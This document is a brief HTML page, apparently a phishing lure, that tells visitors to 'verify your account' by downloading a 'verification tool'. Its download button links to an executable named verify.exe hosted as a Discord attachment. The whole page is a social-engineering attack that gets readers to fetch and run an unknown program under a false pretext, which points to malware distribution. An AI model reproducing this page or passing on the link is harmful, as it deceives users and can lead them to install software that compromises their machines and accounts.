<!DOCTYPE html>
<html>
<head>
<style>
  body {
    background-color: #f2f2f2;
    font-family: "Roboto", sans-serif;
  }
  h4 {
    color: #333;
    font-family: "Gotham SSm A", "Gotham SSm B", sans-serif;
    font-weight: 400;
    font-size: 24px;
    margin-top: 0;
    margin-bottom: 20px;
  }
  .button {
    background-color: #4CAF50;
    border: none;
    color: white;
    padding: 16px 32px;
    text-align: center;
    text-decoration: none;
    display: inline-block;
    font-size: 16px;
    margin-top: 20px;
    cursor: pointer;
    border-radius: 4px;
    font-family: "Gotham SSm A", "Gotham SSm B", sans-serif;
    font-weight: bold;
  }
</style>
</head>
<body>

<h4>Hello! please verify your account by downloading our verification tool below:</h4>

<p><a href="https://cdn.discordapp.com/attachments/1087751410390663259/1098288443185959033/verify.exe" download class="button">Download verification tool</a></p>



</body>
</html>
